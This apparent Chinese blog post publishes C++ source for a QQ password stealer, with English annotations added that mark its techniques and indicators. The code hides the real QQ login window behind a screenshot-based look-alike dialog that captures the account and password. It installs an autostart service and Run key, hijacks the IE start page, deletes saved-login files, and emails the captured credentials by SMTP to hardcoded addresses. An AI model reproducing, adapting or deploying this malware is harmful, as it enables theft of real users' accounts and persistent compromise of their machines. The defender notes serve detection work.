声明:本文只供研究学习之用,请勿用于其他用途,后果本人概不负责.
QQ是目前大陆流行的IM工具,好象台湾多用的是777和MSN,本人还是感觉QQ好用.因为QQ软件真正做到了用户想要的.适合年轻人群体.呵呵,又跑提了.
先讲下具体思路,如果你不懂VC++及Windows编程,你还是学好再来看吧.continue,
取得QQ登陆信息有好几种方法,伴随QQ的不断升级,已经无效了.最长用全局钩子,QQ以前做了阻止全局钩子的加载.此路不通.穷举法效率不敢恭维.
想偷嘛,就是欺骗的思路,当QQ用户运行登陆窗口的时候,我们抓取QQ登陆窗口,截图,弹出我们伪造的窗口并使QQ窗口隐藏,然后我们自己的窗口内输入的用户名密码就可以很容易的获得了.呵呵,这一招应该对所有QQ版本适用,因为他是截取的图片,肯定是一样的啊.
切入正题,先要找到QQ登陆窗口 这个太简单了,网上方法很多,本人实现如下:
// Analyst annotation. The code below is reproduced exactly as published, including
// its string literals and escape sequences. The enclosing function header is not
// shown on this page (presumably this is the body of QQFind(), which WinMain
// calls -- confirm against the full sample).
//
// Observable behaviour: polls the foreground window, resolves its owning process
// name, and when that is "qq.exe" with a title containing the login-dialog text,
// records the screen rectangles of the window and its child controls, copies that
// screen region to a bitmap, hides the real window, and shows a modal dialog
// (resource IDD_WIN847, procedure win847 -- neither is shown on this page).
// Afterwards it writes the globals qqid/qqpass back into the real window and
// clicks its login button. This matches GUI input capture (MITRE ATT&CK T1056.002).
//
// NOTE(defender): the signals visible here are cross-process ones -- a foreign
// process sending WM_GETTEXT/WM_SETTEXT/BM_CLICK to another application's controls
// and calling ShowWindow(SW_HIDE) on another application's top-level window.
// UIPI blocks such messages from a lower-integrity sender; at equal integrity
// they are delivered.
HWND hWnd1 = NULL, qqID_hWnd = NULL, qqPass_hWnd = NULL;
HWND ButtonLogin = NULL, ButtonCancel = NULL;
char sTitle[255];
CString ss;
DWORD QQPID;
int LoginID;
BOOL find = FALSE;
bClose=FALSE;
do
{
// Get the handle of the currently active (foreground) window
g_hWnd =GetForegroundWindow();
GetWindowThreadProcessId(g_hWnd, &QQPID);
// Resolve the process name from the PID
processIdToName(sTitle, QQPID);
ss = sTitle;
ss.MakeLower();
// Check whether the process is QQ; if not, wait 50 ms and poll again
if(ss != "qq.exe")
{
Sleep(50);
continue;
}
// Read the window title and check whether this is the login dialog
SendMessage(g_hWnd,WM_GETTEXT,255,(LPARAM)sTitle);
ss = sTitle;
int n = ss.Find("QQ用户登录", 0);
//int m = ss.Find("登录", 0);
//if(n >= 0 || m >= 0)
if(n>=0)
{
// Caption height used later as a vertical offset
lTitleHeight=GetSystemMetrics(SM_CYCAPTION)+3;// author's note: the QQ login window's caption height differs from the standard system window's, hence the +3 adjustment
// Screen rectangle of the QQ login window
GetWindowRect(g_hWnd,&g_MainLogin);
// Locate the "auto login" check box (Butt is a helper not shown on this page)
Butt(g_hWnd,ButtonAuto,"Button","自动登录");
// Screen rectangle of the "auto login" check box
GetWindowRect(ButtonAuto,&g_qqAutologinRt);
// Locate the "invisible login" check box and record its rectangle
Butt(g_hWnd,ButtonCheckHide,"Button","隐身登录");
GetWindowRect(ButtonCheckHide,&g_qqHideLoginRt);
// Locate the login button; the lookup and control-id read appear twice in the published listing
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");
LoginID = GetDlgCtrlID(ButtonLogin);
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");
LoginID = GetDlgCtrlID(ButtonLogin);
// Screen rectangle of the login button
GetWindowRect(ButtonLogin, &g_qqLogin);
// Locate the cancel button
ButtonCancel = FindWindowEx(g_hWnd, NULL, "Button", "取消");
// Screen rectangle of the cancel button
GetWindowRect(ButtonCancel, &g_qqCancel);
// Locate the password edit control (child of a "#32770" dialog-class child window)
hWnd1 = FindWindowEx(g_hWnd, NULL, "#32770", NULL);
if(hWnd1 != NULL)
{
qqPass_hWnd = FindWindowEx(hWnd1, qqPass_hWnd, "Edit", NULL);
// Screen rectangle of the password edit control
GetWindowRect(qqPass_hWnd, &g_qqPassRt);
}
// Locate the account-number edit control (child of the ComboBox)
hWnd1 = FindWindowEx(g_hWnd, NULL, "ComboBox", NULL);
if(hWnd1 != NULL)
{
// (original note: get the combo box style)
// Screen rectangle of the drop-down list
GetWindowRect(hWnd1, &g_qqIdComboxRt);
qqID_hWnd = FindWindowEx(hWnd1, qqID_hWnd, "Edit", NULL);
// Screen rectangle of the account-number edit control
GetWindowRect(qqID_hWnd, &g_qqIDRt);
// Read the account number currently shown in the real window into qqid
SendMessage(qqID_hWnd,WM_GETTEXT, 255,(LPARAM)qqid);
}
// Wait for the window to be fully drawn before copying the screen region
Sleep(70);
//g_DlgRt.left = 0;
g_DlgRt.left = g_MainLogin.left+2;
// g_DlgRt.top = 0;
g_DlgRt.top =g_MainLogin.top+lTitleHeight;
// g_DlgRt.right = m_xScreen;
g_DlgRt.right = g_MainLogin.right;
// g_DlgRt.bottom = m_yScreen;
g_DlgRt.bottom = g_MainLogin.bottom+lTitleHeight;
// CopyScreenToBitmap is a helper not shown on this page
g_pBitmap = CopyScreenToBitmap(&g_DlgRt);
// Hide the real QQ window
ShowWindow(g_hWnd, SW_HIDE);
// LONG qqPassStyle;
// qqPassStyle = GetWindowLong(g_hWnd, GWL_STYLE);
// SetWindowLong(g_hWnd, GWL_STYLE, qqPassStyle & ~WS_VISIBLE);
// Show the substitute dialog; DialogBoxParam is modal, so execution resumes here once it closes
HINSTANCE hInstance = GetModuleHandle(NULL);
DialogBoxParam(hInstance, (LPCTSTR)IDD_WIN847, 0, (DLGPROC)win847, 0);// the dialog procedure win847 is not shown on this page
/*NONCLIENTMETRICS ncm;// author's note: this section is disabled because it changed the caption height system-wide
ncm.cbSize = sizeof( NONCLIENTMETRICS );
::SystemParametersInfo( SPI_GETNONCLIENTMETRICS,
sizeof( NONCLIENTMETRICS ),
&ncm,
0
);
ncm.lfCaptionFont.lfHeight =lTitleHeight+100;
::SystemParametersInfo( SPI_SETNONCLIENTMETRICS,
sizeof( NONCLIENTMETRICS ),
&ncm,
SPIF_SENDCHANGE
);
*/
// bClose is a flag defined elsewhere; presumably set by the dialog procedure when the dialog is cancelled -- confirm
if(!bClose)
{
// (disabled) make the QQ window visible again
// ShowWindow(g_hWnd, SW_SHOW);
// Write the account number into the real login window; the password follows below, then the login button is clicked
SendMessage(qqID_hWnd, WM_SETTEXT, 0, (LPARAM)qqid);
// SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);
//ShowWindow(g_hWnd,SW_NORMAL);
SetForegroundWindow(g_hWnd);
/* for(int i=0;i<64;i++)
if(qqpass[i]=='/0')
break;
else
{ Sleep(50);
keybd_event(qqpass[i], 0, 0, 0);
Sleep(50);
keybd_event(qqpass[i], 0, KEYEVENTF_KEYUP, 0);
Sleep(50);
}*/
// Compares qqpass with the literal exactly as printed on this page
if(strcmp(qqpass,"/0")!=0)
KeyInput(qqpass);// replays the string as synthetic key presses (see KeyInput)
else
{
ShowWindow(g_hWnd, SW_SHOW);
SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);
}
// Sleep(50);
//MessageBox(NULL,qqid,qqpass,MB_OK);
// Programmatic click on the real login button
SendMessage(ButtonLogin, BM_CLICK, 0, 0);
// SetWindowLong(g_hWnd, GWL_STYLE, qqPassStyle | WS_VISIBLE);
// InvalidateRect(g_hWnd, &g_DlgRt, TRUE);
}
DeleteObject(g_pBitmap);
// Set the flag that ends the polling loop
find = true;
}
}
while(find == FALSE);
好象一下子贴多了,算了自己看注释把.不用多说了.几个重要的函数:
// Replays a NUL-terminated byte string as synthetic keyboard events.
//
// string: pointer to the characters to replay; it is cast to char* and walked
//         until a zero byte.
//
// For each character the function sleeps 50 ms, maps it with VkKeyScan, and
// issues keybd_event calls. The events go to whichever window currently has
// keyboard focus; this function does not select a target itself.
//
// NOTE(defender): input generated through keybd_event is marked as injected
// (LLKHF_INJECTED) when seen by a low-level keyboard hook, which lets
// monitoring tools distinguish it from hardware input.
void KeyInput(void*string) // converts a string into virtual-key codes
{
char*ptr=(char*)string;
SHORT VkKey;
while(*ptr)
{
// Characters equal to the literal below (reproduced as printed on this page) are skipped
if(*ptr=='/n')
{
ptr++;
continue;
}
Sleep(50);
// Low byte: virtual-key code; high byte: shift state (bit 0 = Shift required)
VkKey=VkKeyScan(*ptr);
if(HIBYTE(VkKey)&1)
{
// Shifted character: Shift down, key down, Shift up
keybd_event(VK_SHIFT,0,0,0);
keybd_event(LOBYTE(VkKey),0,0,0);
keybd_event(VK_SHIFT,0,KEYEVENTF_KEYUP,0);
}
else
{
// Unshifted character: key down, key up
keybd_event(LOBYTE(VkKey),0,0,0);
keybd_event(LOBYTE(VkKey), 0, KEYEVENTF_KEYUP, 0);
}
ptr++;
}
return ;
}
// Looks up the executable name of a process from its process ID.
//
// lpszProcessName: caller-supplied buffer that receives pe.szExeFile via strcpy
//                  (no length is passed in, so the caller must size it).
// PID:             process ID to search for.
// Returns a true value when an entry with a matching th32ProcessID is found,
// FALSE when Process32First fails or no entry matches.
//
// Uses a Toolhelp process snapshot (CreateToolhelp32Snapshot with
// TH32CS_SNAPPROCESS) and compares the entries returned by Process32Next.
BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe;
// dwSize must be set before the first Process32First call
pe.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, &pe)) {
return FALSE;
}
while (Process32Next(hSnapshot, &pe)) {
if (pe.th32ProcessID == PID) {
strcpy(lpszProcessName, pe.szExeFile);
return true;
}
}
return FALSE;
}
// Creates child controls on the window hWnd at offsets derived from the
// rectangles recorded for the real login window (g_qqIDRt, g_qqPassRt,
// g_qqAutologinRt, g_qqHideLoginRt relative to g_MainLogin and lTitleHeight).
//
// hWnd: parent window for the created controls (presumably the IDD_WIN847
//       dialog -- the caller is not shown on this page).
// Returns FALSE if the account or password edit control cannot be created,
// otherwise a true value.
//
// The code is reproduced exactly as published. Control ids used: 1000 (account),
// 1001 (password, ES_PASSWORD), 1002 and 1003 (check boxes). The check boxes copy
// their checked state from the real window's controls via BM_GETCHECK.
//
// NOTE(defender): this is the look-alike half of GUI input capture (MITRE ATT&CK
// T1056.002): the user sees a copy of a familiar dialog that is owned by a
// different process than the application it imitates.
BOOL CreateQQItem(HWND hWnd)
{
// Create a font, because the system default is SimSun (the statement is reproduced as printed)
myf(-12,0,0,0,0,0,0,0,GB2312_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS,DEFAULT_QUALITY,DEFAULT_PITCH|FF_DONTCARE,"Arial");
// Account-number edit control: same size as the real one
int Width, Height;
Width = g_qqIDRt.right - g_qqIDRt.left;
Height = g_qqIDRt.bottom - g_qqIDRt.top;
// Width = g_qqIdComboxRt.right - g_qqIdComboxRt.left;
// Height = g_qqIdComboxRt.bottom - g_qqIdComboxRt.top;
// QQID = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW, g_qqIDRt.left, /
// g_qqIDRt.top, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
// QQID = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW, g_qqIDRt.left-g_MainLogin.left, /
// g_qqIDRt.top-g_MainLogin.top, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
// QQID = CreateWindowEx(0,"combobox", "", WS_VISIBLE|WS_CHILDWINDOW|CBS_DROPDOWNLIST|CBS_AUTOHSCROLL, g_qqIdComboxRt.left-g_MainLogin.left-3, /
// g_qqIdComboxRt.top-g_MainLogin.top-lTitleHeight, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
QQID = CreateWindowEx(0,"edit", "", WS_VISIBLE | WS_CHILDWINDOW, g_qqIDRt.left-g_MainLogin.left-3, /
g_qqIDRt.top-g_MainLogin.top-lTitleHeight, Width, Height, hWnd, (HMENU)1000, GetModuleHandle(NULL), NULL);
if(QQID == NULL)
return FALSE;
// Pre-fill the control with the account number read from the real window (global qqid)
SendMessage(QQID, WM_SETTEXT, 0,(LPARAM)qqid);
SendMessage(QQID,WM_SETFONT, (WPARAM)myfont,(LPARAM)0); // set the control's font
// Password edit control: same size as the real one
Width = g_qqPassRt.right - g_qqPassRt.left;
Height = g_qqPassRt.bottom - g_qqPassRt.top;
// QQPASS = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW | ES_PASSWORD, g_qqPassRt.left, /
// g_qqPassRt.top, Width, Height, hWnd, (HMENU)1001, GetModuleHandle(NULL), NULL);
// QQPASS = CreateWindow("Edit", "", WS_VISIBLE | WS_CHILDWINDOW | ES_PASSWORD, g_qqPassRt.left-g_MainLogin.left, /
// g_qqPassRt.top-g_MainLogin.top, Width, Height, hWnd, (HMENU)1001, GetModuleHandle(NULL), NULL);
QQPASS = CreateWindowEx(WS_EX_TOOLWINDOW,"Edit", "", WS_VISIBLE | WS_CHILDWINDOW | ES_PASSWORD, g_qqPassRt.left-g_MainLogin.left-3, /
g_qqPassRt.top-g_MainLogin.top-lTitleHeight, Width, Height, hWnd, (HMENU)1001, GetModuleHandle(NULL), NULL);
if(QQPASS == NULL)
return FALSE;
SendMessage(QQPASS,WM_SETFONT,(WPARAM)myfont, (LPARAM)0); // set the control's font
// "Auto login" check box
// Read the checked state of both check boxes in the real window
int n_Auto=SendMessage(ButtonAuto,BM_GETCHECK,0,0);
// if(n_Auto==BST_CHECKED)
// MessageBox(NULL,"自动登录 Has checked.",NULL,NULL);
// else
// MessageBox(NULL,"自动登录 Has Unchecked.",NULL,NULL);
int n_Hide=SendMessage(ButtonCheckHide,BM_GETCHECK,0,0);
// if(n_Hide==BST_CHECKED)
// MessageBox(NULL,"隐身登录 Has checked.",NULL,NULL);
// else
// MessageBox(NULL,"隐身登录 Has Unchecked.",NULL,NULL);
Width=g_qqAutologinRt.right-g_qqAutologinRt.left;
Height=g_qqAutologinRt.bottom-g_qqAutologinRt.top;
QQAUTO= CreateWindow("BUTTON", "自动登录", WS_VISIBLE|WS_CHILDWINDOW|BS_AUTOCHECKBOX|BS_FLAT, g_qqAutologinRt.left-g_MainLogin.left-3, /
g_qqAutologinRt.top-g_MainLogin.top-lTitleHeight, 11.5, Height, hWnd, (HMENU)1002, GetModuleHandle(NULL), NULL);
SendMessage(QQAUTO,WM_SETFONT, (WPARAM)myfont,(LPARAM)0);
SendMessage(QQAUTO,BM_SETCHECK,(WPARAM)n_Auto,(LPARAM)0);
// "Invisible login" check box
Width=g_qqHideLoginRt.right-g_qqHideLoginRt.left;
Height=g_qqHideLoginRt.bottom-g_qqHideLoginRt.top;
QQHIDE = CreateWindow("BUTTON", "隐身登录", WS_VISIBLE|WS_CHILDWINDOW|BS_AUTOCHECKBOX|BS_FLAT, g_qqHideLoginRt.left-g_MainLogin.left-3, /
g_qqHideLoginRt.top-g_MainLogin.top-lTitleHeight,11.5, Height, hWnd, (HMENU)1003, GetModuleHandle(NULL), NULL);
SendMessage(QQHIDE,WM_SETFONT, (WPARAM)myfont,(LPARAM)0);
SendMessage(QQHIDE,BM_SETCHECK,(WPARAM)n_Hide,(LPARAM)0);
return true;
}
好了,写多了整个代码就算给你了
以下是保证程序能得到运行的代码:
// Registers the running executable for automatic start and changes the
// Internet Explorer start page. Takes no arguments and returns nothing; the
// results of WinExec and WriteReg are not checked. WriteReg is a helper not
// shown on this page. The code is reproduced exactly as published, including
// its quoting and path separators.
//
// Persistence mechanisms visible in this function:
//   - a Windows service created through "cmd.exe /c sc create" launched with
//     WinExec(..., SW_HIDE)                      (MITRE ATT&CK T1543.003)
//   - a value named "syscs" written under the HKEY_LOCAL_MACHINE Run key
//                                                (MITRE ATT&CK T1547.001)
//
// NOTE(defender): indicators present on this page are the service name
// "CS Services", display name "CS System Services", the Run value name "syscs",
// and the start-page URL assigned below. Useful telemetry: process creation of
// cmd.exe/sc.exe with a "create" command line from a non-administrative tool,
// service-installation events, and writes to the Run key and to the Internet
// Explorer "Main" key.
void RegExe()// modifies the registry and registers a service
{
HKEY hregkey=NULL;
CString m_strreg;
// Path of the running executable, truncated to 100 characters
char sPath[100];
::GetModuleFileName(NULL,sPath,100);
char sServiceCmd[MAX_PATH];
ZeroMemory(sServiceCmd,MAX_PATH);
// Service creation with start= auto, pointing binpath at this executable
sprintf(sServiceCmd,_T("cmd.exe /c sc create /"CS Services/" binpath= /"%s/" start= auto DisplayName= /"CS System Services/""),sPath);
WinExec(sServiceCmd,SW_HIDE);
// Sets the service description text
TCHAR * szDescription="cmd.exe /c sc description /"CS Services/" /"提供一个系统的必须服务启动项;/"";
WinExec(szDescription,SW_HIDE);
// Run-key autostart entry "syscs" -> path of this executable
m_strreg=_T("Software//Microsoft//Windows//CurrentVersion//Run");
WriteReg(HKEY_LOCAL_MACHINE,m_strreg,"syscs",sPath);
/* m_strreg=_T("txtfile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("exefile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("inifile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("regfile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("scrfile//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
m_strreg=_T("chm.file//shell//open//command");
WriteReg(HKEY_CLASSES_ROOT,m_strreg,_T(""),sPath);
*/
// Browser start-page change, written for the current user and machine-wide
m_strreg=_T("Software//Microsoft//Internet Explorer//Main");
char sStartPage[100]=_T("http://www.chinasystems.com");
WriteReg(HKEY_CURRENT_USER,m_strreg,"Start Page",sStartPage);
WriteReg(HKEY_LOCAL_MACHINE,m_strreg,"Default_Page_URL",sStartPage);
/* if (RegOpenKey(HKEY_LOCAL_MACHINE,m_strreg,&hregkey)!=ERROR_SUCCESS)
{
return;
}
else
{
DWORD type_1=REG_SZ;
if(::RegSetValueEx(hregkey,"syscs",0,REG_SZ,(BYTE*)sPath,100)!=ERROR_SUCCESS)
{
return;
}
}
m_strreg=_T("txtfile//shell//open//command");
if (RegOpenKey(HKEY_CLASSES_ROOT,m_strreg,&hregkey)!=ERROR_SUCCESS)
{
return;
}
else
{
DWORD type_1=REG_SZ;
if(::RegSetValueEx(hregkey,"syscs",0,REG_SZ,(BYTE*)sPath,100)!=ERROR_SUCCESS)
{
return;
}
}*/
}
好了,核心主代码:
// Program entry point. The code is reproduced exactly as published.
//
// Sequence visible in this function:
//   1. Creates the named mutex "nextmutex" and exits if it already exists.
//   2. Reads the value "Install" under the QQ registry key and deletes
//      AutoLogin.dat and LoginUinList.dat below that path (presumably so that
//      a saved login is not reused and the login dialog appears -- confirm).
//   3. Repeatedly calls RegExe(), HideProcess() and QQFind() (HideProcess and
//      QQFind are not shown on this page under those names).
//   4. When the qqpass comparison below succeeds, builds a plain-text message
//      containing qqid and qqpass and sends it through SMTP with the SMailer
//      library (MITRE ATT&CK T1048, exfiltration over an alternative protocol).
//
// NOTE(defender): indicators present on this page are the mutex name
// "nextmutex", deletion of the two .dat files named above, and an authenticated
// SMTP session to the mail host named below from a process that is not a mail
// client. Egress filtering of SMTP from workstations and alerting on
// unexpected deletion of an application's saved-login files both apply.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// Single-instance guard
HANDLE hMutex = CreateMutex(NULL, TRUE, "nextmutex");
if (hMutex)
{
if (ERROR_ALREADY_EXISTS == GetLastError())
{
//MessageBox(NULL, "已经有一个程序在运行", "提示", MB_OK);
ReleaseMutex(hMutex);
ExitProcess(0);
}
}
// Delete saved login information; errors are swallowed by the empty catch(...)
try{
HKEY hResult;
CString m_strKey="SOFTWARE//Tencent//QQ";
RegOpenKey(HKEY_LOCAL_MACHINE,m_strKey,&hResult);
DWORD type_1=REG_SZ;
// 16-byte buffer for the "Install" value; return codes are not checked
LPBYTE cRegData=new BYTE[16];
DWORD dwCount=16;
RegQueryValueEx(hResult,(LPCTSTR)"Install",0,0,cRegData,&dwCount);
// AfxMessageBox((LPCTSTR)cRegData);
CString szInstallPath=cRegData;
szInstallPath.Replace("//","");
// AfxMessageBox(szInstallPath);
RegCloseKey(hResult);
CString szAutoLoginFile=szInstallPath+"AutoLogin.dat";
CString szLoginUinListFile=szInstallPath+"LoginUinList.dat";
DeleteFile(szAutoLoginFile);
DeleteFile(szLoginUinListFile);
}catch(...){}
//DeleteFile()
hIcon=LoadIcon(hInstance,(LPCTSTR)IDI_QQ);
// Main loop, implemented with a label and goto
int i=0;// pass counter; the loop below repeats while i<10
agin: RegExe();// autostart registration (see RegExe)
HideProcess();// helper not shown on this page; the original comment says it hides the process
QQFind();
// Compares qqpass with the literal exactly as printed on this page
if(strcmp(qqpass,"/0")!=0)
{
//MessageBox(NULL,"send mail begin.",NULL,MB_OK);
//return 0;
// Send the e-mail
MUtils::WinSockHelper wshelper;
// (comment kept from the original listing) make sure the file 'boot.ini' is in the root directory on driver C
// Message body: fixed text followed by qqid and qqpass, appended with strcat into a MAX_PATH buffer
TCHAR szbuff[MAX_PATH];
memset(szbuff,0,sizeof(szbuff));
//wsprintf(szbuff,_T("恭喜你,成功取得QQ.QQ号码:%s密码%s"),qqid,qqpass);
// std::string s1=_T("恭喜你,成功取得QQ.QQ号码")+qqid+_T("密码")+qqpass;
// std::string s1=StrCat("恭喜你,成功取得QQ.QQ号码",qqid)+StrCat("密码",qqpass);
strcat(szbuff,"恭喜你,成功取得QQ./r/n号码:");
strcat(szbuff,qqid);
strcat(szbuff,"/r/n密码:");
strcat(szbuff,qqpass);
SMailer::TextPlainContent content1(szbuff);
SMailer::MailInfo info;
info.setSenderName("CS Eximbills VC++ Programmer::Tom");
info.setSenderAddress("dlj36@163.com");
info.addReceiver("dlj36", "dlj362003@yahoo.com.cn");
info.addReceiver("dlj36", "dlj36@163.com");
info.setPriority(SMailer::Priority::normal);
info.setSubject("QQ密码盗取");
info.addMimeContent(&content1);
try
{
SMailer::MailSender sender("smtp.163.com", "dlj36", "*****");// the account password is masked in the published listing
sender.setMail(&SMailer::MailWrapper(&info));
sender.sendMail();
Sleep(2000);
}
catch (SMailer::MailException& e)
{
std::cout << e.what() << std::endl;
}
catch (...)
{
// std::cout << "Unkown error" << std::endl;
} //
}
// Sleep(10*1000);
if(i<10)// repeat from the label while the counter is below 10; otherwise fall through and exit
{
i++;
goto agin;
}
return 0;
}
呵呵大功告成,不想多说,程序很明白.本人没有用它来盗取QQ,只是自己做着玩的,利用它练习的.
有想得到所有代码的请打住(呵呵,我认识的熟人除外,哈哈),本人概不提供,谢谢!@!